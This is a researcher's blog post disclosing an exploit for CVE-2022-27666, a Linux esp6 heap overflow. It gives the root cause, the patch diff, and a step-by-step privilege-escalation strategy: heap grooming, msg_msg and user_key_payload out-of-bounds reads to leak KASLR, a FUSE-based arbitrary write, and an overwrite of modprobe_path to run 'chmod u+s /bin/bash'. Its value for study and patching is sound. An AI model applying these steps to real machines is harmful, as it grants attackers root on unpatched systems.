CVE-2022-27666: Exploit esp6 modules in Linux kernel

03/28/2022

This post discloses the exploit of CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10. We were initially saving it for pwn2own 2022, but it got patched 2 months before the contest. And thus we decide to disclose our exploit.

Our preliminary experiment shows this vulnerability affects the latest Ubuntu, Fedora, and Debian. Our exploit was built to attack Ubuntu Desktop 21.10 (The latest version while I was writing the exploit).

The exploit achieve around 90% reliability on fresh installed Ubuntu Desktop 21.10 (VMware’s default setup: 4G mem, 2 CPU), we manage to come up with some novel heap stable tricks to mitigate the kernel heap noise. For the exploit technique, it’s my first time doing page-level heap fengshui and cross-cache overflow, and I choose msg_msg’s arb read & write to leak the KASLR offset and escalate the privilege. I’ve learned so much during writing this exploit and hope you have fun reading it.

Root Cause

CVE-2022-27666 is a vulnerability in Linux esp6 crypto module, it was introduced in 2017, by commit cac2661c53f3 and commit 03e2a30f6a27. The basic logic of this vulnerability is that the receiving buffer of a user message in esp6 module is an 8-page buffer, but the sender can send a message larger than 8 pages, which clearly creates a buffer overflow.

esp6_output_head takes charge of allocating the receiving buffer, the allocsize isn’t important here, skb_page_frag_refill by default allocates an 8-page contiguous buffer at line 9.

int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *esp)
{
        ...
        int tailen = esp->tailen;
        allocsize = ALIGN(tailen, L1_CACHE_BYTES);

        spin_lock_bh(&x->lock);

        if (unlikely(!skb_page_frag_refill(allocsize, pfrag, GFP_ATOMIC))) {
        	spin_unlock_bh(&x->lock);
	        goto cow;
        }
        ...
}

bool skb_page_frag_refill(unsigned int sz, struct page_frag *pfrag, gfp_t gfp)
{
        if (pfrag->offset + sz <= pfrag->size)
		return true;
	...
	if (SKB_FRAG_PAGE_ORDER &&
	    !static_branch_unlikely(&net_high_order_alloc_disable_key)) {

		pfrag->page = alloc_pages((gfp & ~__GFP_DIRECT_RECLAIM) |
					  __GFP_COMP | __GFP_NOWARN |
					  __GFP_NORETRY,
					  SKB_FRAG_PAGE_ORDER);
		...
	}
	...
	return false;
}

skb_page_frag_refill allocates order-3 pages, which is an 8-page contiguous buffer. Therefore, the maximum size of the receiving buffer is 8 pages, and the incoming data can be larger than 8 pages, so it creates a buffer overflow in null_skcipher_crypt. In this function (line 11), kernel copies an N-pages data to an 8 pages buffer, which clearly causes an out-of-bounds write.

static int null_skcipher_crypt(struct skcipher_request *req)
{
	struct skcipher_walk walk;
	int err;

	err = skcipher_walk_virt(&walk, req, false);

	while (walk.nbytes) {
		if (walk.src.virt.addr != walk.dst.virt.addr)
			// out-of-bounds write
			memcpy(walk.dst.virt.addr, walk.src.virt.addr,
			       walk.nbytes);
		err = skcipher_walk_done(&walk, 0);
	}

	return err;
}

Now, let’s look at the patch that fixes this vulnerability. ESP_SKB_FRAG_MAXSIZE is 32768, equal to 8 pages. If the allocsize is bigger than 8 pages, then fallback to COW;

diff --git a/include/net/esp.h b/include/net/esp.h
index 9c5637d41d951..90cd02ff77ef6 100644
--- a/include/net/esp.h
+++ b/include/net/esp.h
@@ -4,6 +4,8 @@
 
 #include <linux/skbuff.h>
 
+#define ESP_SKB_FRAG_MAXSIZE (PAGE_SIZE << SKB_FRAG_PAGE_ORDER)
+
 struct ip_esp_hdr;
 
 static inline struct ip_esp_hdr *ip_esp_hdr(const struct sk_buff *skb)
diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
index e1b1d080e908d..70e6c87fbe3df 100644
--- a/net/ipv4/esp4.c
+++ b/net/ipv4/esp4.c
@@ -446,6 +446,7 @@ int esp_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *
 	struct page *page;
 	struct sk_buff *trailer;
 	int tailen = esp->tailen;
+	unsigned int allocsz;
 
 	/* this is non-NULL only with TCP/UDP Encapsulation */
 	if (x->encap) {
@@ -455,6 +456,10 @@ int esp_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *
 			return err;
 	}
 
+	allocsz = ALIGN(skb->data_len + tailen, L1_CACHE_BYTES);
+	if (allocsz > ESP_SKB_FRAG_MAXSIZE)
+		goto cow;
+
 	if (!skb_cloned(skb)) {
 		if (tailen <= skb_tailroom(skb)) {
 			nfrags = 1;
diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
index 7591160edce14..b0ffbcd5432d6 100644
--- a/net/ipv6/esp6.c
+++ b/net/ipv6/esp6.c
@@ -482,6 +482,7 @@ int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info
 	struct page *page;
 	struct sk_buff *trailer;
 	int tailen = esp->tailen;
+	unsigned int allocsz;
 
 	if (x->encap) {
 		int err = esp6_output_encap(x, skb, esp);
@@ -490,6 +491,10 @@ int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info
 			return err;
 	}
 
+	allocsz = ALIGN(skb->data_len + tailen, L1_CACHE_BYTES);
+	if (allocsz > ESP_SKB_FRAG_MAXSIZE)
+		goto cow;
+
 	if (!skb_cloned(skb)) {
 		if (tailen <= skb_tailroom(skb)) {
 			nfrags = 1;

Exploitability

In our preliminary experiment, we manage to send 16-pages data, which means we create an 8-pages overflow in the kernel space, it’s pretty enough for a generic OOB write. One thing worth mentioning is that esp6 appends several bytes to the tail in function esp_output_fill_trailer. These bytes are calculated from the length of the incoming message and the protocol we are using.

static inline void esp_output_fill_trailer(u8 *tail, int tfclen, int plen, __u8 proto)
{
	/* Fill padding... */
	if (tfclen) {
		memset(tail, 0, tfclen);
		tail += tfclen;
	}
	do {
		int i;
		for (i = 0; i < plen - 2; i++)
			tail[i] = i + 1;
	} while (0);
	tail[plen - 2] = plen - 2;
	tail[plen - 1] = proto;
}

The tail calculation is shown above, their values are strictly bound with the length and protocol. we cannot make them be arbitrary values, and therefore we consider the tail bytes are garbage data.

Page-level heap fengshui

Doesn’t like any other exploits I developed before, this vulnerability requires a page-level heap fengshui. Remember that OOB write comes from an 8-page contiguous buffer, which means the overflow occurs to the adjacent pages. Back to days I started writing the exploit, I had no experience dealing with the page allocator, so I literally went through the entire page_alloc.c and understood the underlying mechanisms that help develop this exploit.

Page allocator

Linux page allocator^[2], A.K.A. buddy allocator, manages physical pages in Linux kernel. Page allocator maintains lower-level memory management behind memory allocators like SLUB, SLAB, SLOB. One simple example is that when kernel consumes all slabs of kmalloc-4k, the memory allocators would request a new slab/memory from the page allocator, in this case, kmalloc-4k has an 8 pages (order 3) slab so it asks for an 8 pages memory from the page allocator.

Page allocator maintains free pages in a data structure called free_area. It’s an array that keeps different orders/sizes of pages. The term to differentiate page sizes is order. To calculate the size of N-order pages, use PAGE_SIZE << N. In such case, order-0 page equates to 1 page (PAGE_SIZE << 0), order-1 pages equate to 2 pages (PAGE_SIZE << 1) , … , order-3 pages equate 8 pages (PAGE_SIZE << 3). For each order in free_area, it maintains a free_list. Pages are allocated from the free_list and freed back to the free_list.

Different kernel slabs request different orders of pages when the free_list is consumed up. For example, on Ubuntu 21.10, kmalloc-256 requests order-0 page, kmalloc-512 requests order-1 pages, kmalloc-4k requests order-3 pages.

If there are no freed pages in that free_list, the lower-order free_area borrows pages from a higher-order free_area. In that case, higher-order pages split up into two blocks, the lower-address block sent to the pages request source (usually alloc_pages()) , the higher-address block sent to the free_list of the lower order. For example, when order-2 (4 pages) free_list are all consumed up, it requests pages from order-3 (8 pages), the order-3 pages split into two 4-page blocks, the lower-address 4 pages block has been assigned to the object that request those pages, the higher-address 4 pages block was sent to order-2’s free_list, so next time if a process requests order-2 pages again, there would be one freed order-2 pages available in its free_list.

*Figure 1: higher order split up to lower order*

If there are too many freed pages in a free_list, the page_allocator starts merging two same order and physically adjacent pages into a higher order. Let’s take the same example above to explain. If an order-3 page got split into two order-2 pages, one of them has been allocated and the other stays in order-2’s free_list. Once that allocated pages got freed back to order-2’s free_list, page allocator checks if these newly freed pages have adjacent pages in the same free_list (they are called ‘buddy’), if so, they will be merged into order 3.

*Figure 2: Lower-order merged into higher-order*

The following code snippet shows how the page allocator picks up pages blocks from free_area and how to borrow pages from a higher order.

static __always_inline
struct page *__rmqueue_smallest(struct zone *zone, unsigned int order,
						int migratetype)
{
	unsigned int current_order;
	struct free_area *area;
	struct page *page;


	for (current_order = order; current_order < MAX_ORDER; ++current_order) {
		// Pick up the right order from free_area
		area = &(zone->free_area[current_order]);
		// Get the page from the free_list
		page = get_page_from_free_area(area, migratetype);
		// If no freed page in free_list, goes to high order to retrieve
		if (!page)
			continue;
		del_page_from_free_list(page, zone, current_order);
		expand(zone, page, order, current_order, migratetype);
		set_pcppage_migratetype(page, migratetype);
		return page;
	}

	return NULL;
}

static inline struct page *get_page_from_free_area(struct free_area *area,
					    int migratetype)
{
	return list_first_entry_or_null(&area->free_list[migratetype],
					struct page, lru);
}

Shaping Heap^[3]

Now let’s talk about how to arrange the heap layout for the OOB write. As we already knew, the page allocator keeps a free_list for each order in free_area. Pages come and go in free_list, there is no guarantee that two page-blocks in the same free_list are contiguous, thus even we allocate the same order of pages consecutively, they might still be far away from each other. In order to shape the heap correctly, we have to make sure all pages in one free_list are contiguous. To do so, we need to drain the free_list of the target order and cause them to borrow page blocks from the higher order. Once it borrows pages from a higher order, two consecutively allocations will split the higher-order pages, and most importantly, the higher-order pages are a chunk of contiguous memory.

Mitigating noise

One challenge for shaping heap is how to mitigate the noise? We noticed that some kernel daemon processes constantly allocate and free pages back and forth, lower-order pages can merge into higher-order, higher-order pages will split to fulfill the needs of the lower order, these create tons of noise while doing heap grooming. In our case, we try to do heap grooming with order-3 pages, but order-2 always requests and splits order-3 pages or sometimes order-2 pages are merged back to order-3’s free_list.

To mitigate this noise, I did something shown below:

drain the freelist of order 0, 1, 2.
allocate tons of order-2 objects(assume it’s N), by doing so, order 2 will borrow pages from order 3.
free every half of objects from step 2, hold the other half. This create N/2 more object back to order-2’s freelist.
free all objects from step 1

In step 3, we don’t want to free all of them because they will go back to order 3 when they find adjacent pages in the order-2’s free_list. Freeing every half of order-2 pages will put them in order-2’s free_list forever. This method creates N/2 more pages in order-2’s free_list and thus prevents order 2 from borrowing/merging pages from/to order 3. This strategy protects our heap grooming.

*Figure 3: This animation shows the noise mitigation strategy*

Leaking KASLR offset

Candidate 1: struct msg_msg

The first step for exploiting is to leak the KASLR offset. One simple idea that came to my mind is using struct msg_msg to create an arbitrary read. The basic idea of this approach is overwriting the m_ts field in struct msg_msg which changes the length of the message (struct msg_msgseg). m_ts controls the length of the message pointed by next pointer. By overwriting m_ts, we can read out-of-bound on next pointer.

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

While I was testing, I realized the garbage bytes that append to the tail totally corrupt this approach. When we are overwriting the m_ts field, the garbage bytes will also overwrite a few bytes in next pointer. Since the next is corrupted, the out-of-bounds read makes no sense. (OOB read from the address pointed by this next pointer.

*Figure 4: Garbage data corrupts pointer*

Candidate 2: struct user_key_payload

I was stuck at this phase for a while, I need to find some other structures that don’t have a critical field right behind the field I plan to overwrite, otherwise, the garbage data will corrupt it. I read a few papers^[6]to gain some insights, eventually, I found this structure called user_key_payload fits all my requirements.

struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */
	unsigned short	datalen;	/* length of this data */
	char		data[] __aligned(__alignof__(u64)); /* actual data */
};

rcu pointer can be safely set to NULL, datalen is the length field we plan to overwrite, garbage data corrupt several bytes in data[], which is fine since they are just pure data.

One realistic constraint of this structure is that normal users on Ubuntu have a per-user hard limit for how many keys you can have and how many bytes in total you can allocate. As shown in the picture below, Ubuntu allows a normal user to have a maximum of 200 keys and 20000 bytes payload in total.

This limitation makes the exploit become a little bit tricky. Let’s take a look at the preliminary heap layout again. The vulnerable buffer overflows to the adjacent memory (Victim SLAB in the picture). In order to allocate a valid slab on this victim memory, the slab size must be 8 pages. On Ubuntu, only kmalloc-2k, kmalloc-4k, and kmalloc-8k have the order-3 slabs.

I decided to fill the victim SLAB with kmalloc-4k objects, so it makes the minimal size of the user_key_payload to be 2049 bytes (round up to 4k). For kmalloc-4k, each slab has 8 objects. To fill the whole slab with user_key_payload, we have to consume 2049*8=16392 bytes. Remember we have only 20000 bytes in total, and thus there is only one user_key_payload left. So in total ((20000-16392)/2049=1). To conclude, we have two slabs for heap fengshui, which gives us a very weak fault tolerance, any noise could break our fengshui.

*Figure 5: Weak fault tolerance SLAB layout*

To mitigate this problem, I choose a one user_key_payload per slab approach. Every time I allocate only 1 user_key_payload in each slab and fill the rest of the slab with other objects. user_key_payload‘s position could be arbitrary in the slab due to the freelist randomization. It’s fine in our case, the out-of-bounds write can overwrite the entire slab (8 pages) which will eventually cover the user_key_payload object. With this approach, I can create 9 slabs instead of 2 for the heap fengshui, and it succeeds as long as one slab is in the right place.

*Figure 6: Strong fault tolerance SLAB layout*

What to read?

We have the user_key_payload in place now, let’s start thinking about what kernel object we plan to leak. The simplest way is to put an object with a function pointer next to user_key_payload, then we will leak the KASLR offset by calculating the difference of the function pointer with its address in symbol file. However, I really want to demonstrate the arb read & write techniques from this amazing post, and that’s why I choose to leak the correct next pointer of struct msg_msg.

If I have a correct next pointer, then later I can overwrite m_ts and replace next pointer without worrying corrupt anything (security pointer will be corrupted when overwriting next pointer, but security pointer has no use on Ubuntu, and it’s always zero).

Phase 1: Leak a correct next pointer from struct msg_msg

The heap layout is shown in the picture below. The black arrow represents OOB write, the orange arrow represents OOB read. First, we use the initial OOB write to overwrite the datalen of struct user_key_payload, and then achieve an OOB read by reading the payload of the corrupted struct user_key_payload, our target is the next pointer in struct msg_msg.

Since we will use this next pointer for KASLR leaking later, we have to prepare tons of struct seq_operations along with struct msg_msgseg. Both structures should fall to kmalloc-32, and this gives the msg size a constraint: 4056 bytes to 4072 bytes. It’s because only 4096- 48(header of msg_msg) bytes will be put into the main msg body, and the rest goes to the linked list maintained by next pointer. To make sure the next pointer points to kmalloc-32, the data in struct msg_msgseg cannot exceed 32-8(header of msg_msgseg) bytes and cannot less than 16-8 bytes (otherwise goes to kmalloc-16). If you still cannot understand this, check out this post.

*Figure 7: High-level heap layout for leaking next pointer*

To increment the success rate and mitigate the noise, we create 9 pairs of such heap layout (9 is the most amount of user_key_payload that I can allocate within kmalloc-4k), as long as one pair succeeds, we will get the correct next pointer of struct msg_msg.

*Figure 8: A fine-grained explanation about our heap fengshui*

Phase 2: Leak KASLR offset

Once we have the correct next pointer, we enter phase 2. We create another heap layout to leak the KASLR offset. struct seq_operations is a good candidate. We use the initial OOB write to overwrite the m_ts (the length of the message) and next pointer (the address of the message), thus we will read the function pointer from struct seq_operations.

*Figure 9: The black arrow represents OOB write, the orange arrow represents OOB read*

So my leaking step is:

Phase 1

Allocate tons of 8-page buffer to drain order-3’s free_list. Then order-3 will borrows pages from higher-order which makes them contiguous.
Allocate three contiguous 8-page dummy object.
Free the second dummy object, allocate a 8-page slab that contains 1 struct user_key_payload and 7 other objects.
Free the thrid dummy object, allocates a 8-page slab that is full of struct msg_msg. The size of message must be in range 4056 to 4072 in order to make struct msg_msgseg falls to kmalloc-32
Allocate tons of struct seq_operations. Those structures will be in the same slab with struct msg_msgseg that we allocate in step 4.
Free the first dummy object, allocates the vulnerabilt buffer, and start out-of-bounds write, we plan to modify the datalen field in struct user_key_payload.
If step 6 succeeds, retrieving the payload of this user_key_payload will leads to an out-of-bounds read. This OOB read will tell us the content of struct msg_msg including it’s next pointer.
If step 7 succeeds, we now have a correct next pointer of a struct msg_msg object.

Phase 2

Allocate two contiguous dummy 8-page object.
Free the second dummy object, allocate a slab full of struct msg_msg.
Free the first dummy object, allocate the vulnerable buffer, overwrite the m_ts field with a bigger value and also overwrite the next pointer with the one we got from phase1 step 7.
If phase2 step 3 succeeds, we should have an OOB read on kmalloc-32 memory. It’s very likely that we will read the function pointer from struct seq_operations that were allocated in phase1 step 5. Then we calculate the KASLR offset.

Get Root

Once we leaked the KASLR offset, msg_msg’s arbitrary write becomes a valid option. The idea of this technique^[1] is to hang the first copy_from_user from copying user data(line 7), and then change the next pointer(line 11 shows seg comes from msg->next), resume the process, the next copy_from_user would be an arbitrary write (line 17).

struct msg_msg *load_msg(const void __user *src, size_t len)
{

	...
	// hang the process at the first copy_from_user
	// modify the msg->next and resume the process
	if (copy_from_user(msg + 1, src, alen))
		goto out_err;

	// msg->next has been changed to an arbitrary memory
	for (seg = msg->next; seg != NULL; seg = seg->next) {
		len -= alen;
		src = (char __user *)src + alen;
		alen = min(len, DATALEN_SEG);

		// Now an arbitrary write happens
		if (copy_from_user(seg + 1, src, alen))
			goto out_err;
	}

	...
}

If you are familiar with userfaultfd, you might know the technique that uses userfaultfd to hang the process. I posted a blog about it around two years ago. Unfortunately, a normal user needs a specific capability to use userfaultfd after kernel v5.11. But now we have another technique to do the same thing. Thanks to Jann^[4] for sharing the idea of using FUSE^[5]. FUSE is a filesystem for userspace, we can create our own filesystem and map memory on it, all the read and write go through that memory will be handled by our own file system. Therefore, we can simply hang the process in our custom read (copy_from_user read data from userspace) and release it when the next pointer has been changed.

*Figure 10: Demonstrate how abusing FUSE achieves the arb write*

By utilizing the arbitrary write, we overwrite the path of modprobe. modprobe is a userspace program that loads kernel modules. Every time kernel plans to load a module, it does an upcall to userspace and runs modprobe as root to load the target module. To know where the modprobe locates at, kernel has compiled the path in a hard code way, the path of modprobe stores in a global variable modprobe_path.

*Figure 11: Use arb write to overwrite modprobe_path*

My exploit changes the modprobe_path to my own program /tmp/get_rooot that runs chmod u+s /bin/bash. When the kernel runs /tmp/get_rooot as root, it changes the permission of /bin/bash, anyone who runs the bash will run it as root.

My steps to get a root shell:

Allocate two contigious 8-page dummy object
Map the message content to FUSE and free the second dummy object, allocate an 8-page slab full of struct msg_msg. Threads would be hanged in this step.
Free the first dummy object, allocate the vulnerable object, replace the next pointer of the adjacent struct msg_msg with the address of modprobe_path.
Release the threads that hang in step 2, copy string “/tmp/get_rooot” to modprobe_path
Trigger the modprobe by running a unknown format file
Open /bin/bash, we are root now

Access exploit on my Github

Reference

[1] https://www.willsroot.io/2022/01/cve-2022-0185.html [2] https://www.kernel.org/doc/gorman/html/understand/understand009.html [3] https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html [4] https://bugs.chromium.org/p/project-zero/issues/detail?id=808 [5] https://github.com/nrb547/kernel-exploitation/blob/main/cve-2021-32606/cve-2021-32606.md [6] https://zplin.me/papers/ELOISE.pdf

Special thanks to Norbert Slusarek and Zhiyun Qian